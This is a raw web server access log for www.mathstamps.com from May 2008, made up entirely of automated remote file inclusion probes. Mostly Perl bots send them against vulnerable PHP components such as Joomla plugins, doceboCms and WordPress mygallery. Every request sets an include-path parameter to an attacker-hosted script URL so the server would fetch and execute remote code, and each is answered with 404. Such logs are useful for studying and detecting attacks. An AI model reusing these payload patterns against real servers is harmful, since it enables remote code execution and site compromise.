208.99.194.216 - - [11/May/2008:17:00:13 -0700] "GET /logs/access_080505.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://8-p.ru/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
212.97.132.117 - - [11/May/2008:17:01:24 -0700] "GET /logs/access_080421.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://8-p.ru/components/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.mathstamps.com"
212.97.132.117 - - [11/May/2008:17:02:31 -0700] "GET /logs/access_080421.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://8-p.ru/components/id.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.mathstamps.com"
88.84.144.62 - - [11/May/2008:17:03:33 -0700] "GET /logs/access_080414.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
88.84.144.62 - - [11/May/2008:17:03:34 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
88.84.144.62 - - [11/May/2008:17:03:34 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
88.84.144.62 - - [11/May/2008:17:03:35 -0700] "GET /logs/access_080414.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
88.84.144.62 - - [11/May/2008:17:03:35 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
88.84.144.62 - - [11/May/2008:17:03:36 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
88.84.144.62 - - [11/May/2008:17:03:54 -0700] "GET /logs/access_080414.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
88.84.144.62 - - [11/May/2008:17:03:54 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
88.84.144.62 - - [11/May/2008:17:03:55 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
87.106.51.184 - - [11/May/2008:17:07:09 -0700] "GET /logs/access_080414.log//%2Fadministrator%2Fcomponents%2Fcom_serverstat%2Finstall.serverstat.phpmosConfig_absolute_path=http://nairalanders.110mb.com/fuckrox-id%5B1%5D.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
87.106.51.184 - - [11/May/2008:17:07:09 -0700] "GET //%2Fadministrator%2Fcomponents%2Fcom_serverstat%2Finstall.serverstat.phpmosConfig_absolute_path=http://nairalanders.110mb.com/fuckrox-id%5B1%5D.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
87.106.51.184 - - [11/May/2008:17:07:09 -0700] "GET /logs//%2Fadministrator%2Fcomponents%2Fcom_serverstat%2Finstall.serverstat.phpmosConfig_absolute_path=http://nairalanders.110mb.com/fuckrox-id%5B1%5D.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
208.99.194.216 - - [11/May/2008:17:07:14 -0700] "GET /logs/access_080421.log//newspublish/include.php?path%5Bdocroot%5D=http://8-p.ru/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
88.84.144.62 - - [11/May/2008:17:10:13 -0700] "GET /logs/access.log/joomla/index.php?option=com_restaurante&task=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
88.84.144.62 - - [11/May/2008:17:10:13 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
208.99.194.216 - - [11/May/2008:17:10:13 -0700] "GET /logs/access_080421.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://8-p.ru/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
88.84.144.62 - - [11/May/2008:17:10:13 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
91.121.3.126 - - [11/May/2008:17:10:23 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.filmbox.ru/d.pl? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
91.121.3.126 - - [11/May/2008:17:10:23 -0700] "GET //ashnews.php?pathtoashnews=http://www.filmbox.ru/d.pl? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
88.84.144.62 - - [11/May/2008:17:10:24 -0700] "GET /logs/access_080421.log/joomla/index.php?option=com_restaurante&task=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
88.84.144.62 - - [11/May/2008:17:10:27 -0700] "GET /logs/access.log/joomla/index.php?option=com_restaurante&task=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
88.84.144.62 - - [11/May/2008:17:10:28 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
88.84.144.62 - - [11/May/2008:17:10:28 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
88.84.144.62 - - [11/May/2008:17:10:39 -0700] "GET /logs/access.log/joomla/index.php?option=com_restaurante&task=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
88.84.144.62 - - [11/May/2008:17:10:39 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
88.84.144.62 - - [11/May/2008:17:10:40 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
88.84.144.62 - - [11/May/2008:17:10:44 -0700] "GET /logs/access_080421.log/joomla/index.php?option=com_restaurante&task=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
88.84.144.62 - - [11/May/2008:17:10:50 -0700] "GET /logs/access_080421.log/joomla/index.php?option=com_restaurante&task=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
88.84.144.62 - - [11/May/2008:17:14:00 -0700] "GET /logs/access_080421.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
88.84.144.62 - - [11/May/2008:17:14:08 -0700] "GET /logs/access_080421.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
88.84.144.62 - - [11/May/2008:17:14:14 -0700] "GET /logs/access_080421.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
62.116.117.149 - - [11/May/2008:17:14:53 -0700] "GET /logs/access_080303.log//oneadmin/photogallery/include.php?path[docroot]=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.mathstamps.com"
62.116.117.149 - - [11/May/2008:17:14:53 -0700] "GET /logs/access_080303.log/errors.php?error=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.mathstamps.com"
62.116.117.149 - - [11/May/2008:17:14:54 -0700] "GET //oneadmin/photogallery/include.php?path[docroot]=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.mathstamps.com"
62.116.117.149 - - [11/May/2008:17:14:54 -0700] "GET /errors.php?error=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.mathstamps.com"
62.116.117.149 - - [11/May/2008:17:14:55 -0700] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.mathstamps.com"
62.116.117.149 - - [11/May/2008:17:14:55 -0700] "GET /logs/errors.php?error=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.mathstamps.com"
211.233.6.126 - - [11/May/2008:17:16:02 -0700] "GET /logs/access_080331.log/errors.php?error=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
62.116.117.149 - - [11/May/2008:17:16:12 -0700] "GET /logs/access.log//oneadmin/photogallery/include.php?path[docroot]=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.mathstamps.com"
62.116.117.149 - - [11/May/2008:17:16:12 -0700] "GET /logs/access.log/errors.php?error=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.mathstamps.com"
72.233.79.202 - - [11/May/2008:17:16:30 -0700] "GET /errors.php?error=http://nodaorlz.100webspace.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.mathstamps.com"
72.233.79.202 - - [11/May/2008:17:16:30 -0700] "GET /logs/errors.php?error=http://nodaorlz.100webspace.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.mathstamps.com"
91.121.3.126 - - [11/May/2008:17:20:47 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.filmbox.ru/d.pl? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
91.121.3.126 - - [11/May/2008:17:20:51 -0700] "GET /logs/access_080414.log//ashnews.php?pathtoashnews=http://www.filmbox.ru/d.pl? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
88.84.144.62 - - [11/May/2008:17:21:02 -0700] "GET /logs/access_080421.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
88.84.144.62 - - [11/May/2008:17:21:03 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
88.84.144.62 - - [11/May/2008:17:21:03 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
88.84.144.62 - - [11/May/2008:17:21:08 -0700] "GET /logs/access_080421.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
88.84.144.62 - - [11/May/2008:17:21:09 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
88.84.144.62 - - [11/May/2008:17:21:09 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
67.205.67.241 - - [11/May/2008:17:21:35 -0700] "GET /modulescjaycontentadmineditor2spaw_control.class.php?spaw_root=ftp://194.177.97.246/tmp/1422423437/24224234310/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
67.205.67.241 - - [11/May/2008:17:21:35 -0700] "GET /modulescjaycontentadmineditor2spaw_control.class.php?spaw_root=ftp://194.177.97.246/tmp/1422423437/24224234310/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
64.22.89.194 - - [11/May/2008:17:23:06 -0700] "GET /logs/access_080505.log//components/com_extcalendar/admin_events.php?CONFIG_EXT%5BLANGUAGES_DIR%5D=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
64.22.89.194 - - [11/May/2008:17:23:06 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT%5BLANGUAGES_DIR%5D=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
64.22.89.194 - - [11/May/2008:17:23:06 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT%5BLANGUAGES_DIR%5D=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
218.38.29.233 - - [11/May/2008:17:25:23 -0700] "GET /logs/access_080421.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://war-crew.iespana.es/mic22.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.mathstamps.com"
218.38.29.233 - - [11/May/2008:17:25:24 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://war-crew.iespana.es/mic22.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.mathstamps.com"
83.149.123.164 - - [11/May/2008:17:26:05 -0700] "GET /logs/access_080505.log///calendar2//tools/send_reminders.php?noSet=0&includedir=http://trilbardou.free.fr/ancien/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
83.149.123.164 - - [11/May/2008:17:26:05 -0700] "GET ///calendar2//tools/send_reminders.php?noSet=0&includedir=http://trilbardou.free.fr/ancien/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
83.149.123.164 - - [11/May/2008:17:26:06 -0700] "GET /logs///calendar2//tools/send_reminders.php?noSet=0&includedir=http://trilbardou.free.fr/ancien/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
218.38.29.233 - - [11/May/2008:17:28:23 -0700] "GET /logs/access_080310.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://war-crew.iespana.es/mic22.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.mathstamps.com"
83.149.123.164 - - [11/May/2008:17:34:34 -0700] "GET /logs/access_080407.log///calendar2//tools/send_reminders.php?noSet=0&includedir=http://trilbardou.free.fr/ancien/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
64.22.89.194 - - [11/May/2008:17:34:55 -0700] "GET /logs/access_080421.log//skin/zero_vote/error.php?dir=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
64.22.89.194 - - [11/May/2008:17:34:55 -0700] "GET //skin/zero_vote/error.php?dir=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
64.22.89.194 - - [11/May/2008:17:34:55 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
92.48.74.30 - - [11/May/2008:17:36:03 -0700] "GET /logs/access_080505.log/browse.php/header.php?prefix=http://www.ownar.xpg.com.br/cmdbuscador.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
92.48.74.30 - - [11/May/2008:17:36:03 -0700] "GET /browse.php/header.php?prefix=http://www.ownar.xpg.com.br/cmdbuscador.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
92.48.74.30 - - [11/May/2008:17:36:03 -0700] "GET /logs/browse.php/header.php?prefix=http://www.ownar.xpg.com.br/cmdbuscador.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
160.99.12.231 - - [11/May/2008:17:39:44 -0700] "GET /logs/access_080407.log//skin/zero_vote/ask_password.php?dir=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
160.99.12.231 - - [11/May/2008:17:39:45 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
160.99.12.231 - - [11/May/2008:17:39:45 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
88.84.144.62 - - [11/May/2008:17:40:07 -0700] "GET /logs/access.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
160.99.12.231 - - [11/May/2008:17:40:07 -0700] "GET /logs/access_080505.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
88.84.144.62 - - [11/May/2008:17:40:08 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
160.99.12.231 - - [11/May/2008:17:40:08 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
88.84.144.62 - - [11/May/2008:17:40:08 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
160.99.12.231 - - [11/May/2008:17:40:08 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
88.84.144.62 - - [11/May/2008:17:40:11 -0700] "GET /logs/access_080303.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
88.84.144.62 - - [11/May/2008:17:40:23 -0700] "GET /logs/access.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
88.84.144.62 - - [11/May/2008:17:40:23 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
88.84.144.62 - - [11/May/2008:17:40:23 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
88.84.144.62 - - [11/May/2008:17:40:26 -0700] "GET /logs/access_080303.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
88.84.144.62 - - [11/May/2008:17:40:56 -0700] "GET /logs/access.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
88.84.144.62 - - [11/May/2008:17:40:57 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
88.84.144.62 - - [11/May/2008:17:40:57 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
88.84.144.62 - - [11/May/2008:17:41:00 -0700] "GET /logs/access_080303.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
193.26.1.33 - - [11/May/2008:17:42:14 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
74.53.137.18 - - [11/May/2008:17:42:22 -0700] "GET //skin/zero_vote/error.php?dir=http://blackcrew.biz/dur.haka?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
69.90.72.88 - - [11/May/2008:17:44:29 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://cocreation.hk/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
62.75.184.206 - - [11/May/2008:17:45:05 -0700] "GET /logs/access_080505.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
62.75.184.206 - - [11/May/2008:17:45:05 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
62.75.184.206 - - [11/May/2008:17:45:05 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
211.172.232.90 - - [11/May/2008:17:46:46 -0700] "GET /logs/access_080407.log//index3.php?pag=http://nairalanders.110mb.com/fuckrox-id%5B1%5D.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
211.172.232.90 - - [11/May/2008:17:46:46 -0700] "GET //index3.php?pag=http://nairalanders.110mb.com/fuckrox-id%5B1%5D.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
211.172.232.90 - - [11/May/2008:17:46:48 -0700] "GET /logs//index3.php?pag=http://nairalanders.110mb.com/fuckrox-id%5B1%5D.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
74.53.240.146 - - [11/May/2008:17:48:45 -0700] "GET /logs/access.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
74.53.240.146 - - [11/May/2008:17:48:46 -0700] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
74.53.240.146 - - [11/May/2008:17:48:46 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
77.232.68.17 - - [11/May/2008:17:48:50 -0700] "GET /logs/access.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
77.232.68.17 - - [11/May/2008:17:48:50 -0700] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
77.232.68.17 - - [11/May/2008:17:48:50 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
77.232.68.17 - - [11/May/2008:17:48:51 -0700] "GET /logs/access.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
77.232.68.17 - - [11/May/2008:17:48:52 -0700] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
77.232.68.17 - - [11/May/2008:17:48:52 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
200.195.11.193 - - [11/May/2008:17:49:46 -0700] "GET /logs/access.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
200.195.11.193 - - [11/May/2008:17:49:46 -0700] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
200.195.11.193 - - [11/May/2008:17:49:47 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
74.53.137.18 - - [11/May/2008:17:50:55 -0700] "GET /logs/access_080421.log//skin/zero_vote/error.php?dir=http://blackcrew.biz/dur.haka?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
74.53.137.18 - - [11/May/2008:17:50:55 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://blackcrew.biz/dur.haka?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
160.99.12.231 - - [11/May/2008:17:51:39 -0700] "GET /logs/access_080421.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
83.19.144.26 - - [11/May/2008:17:52:35 -0700] "GET /logs/access.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
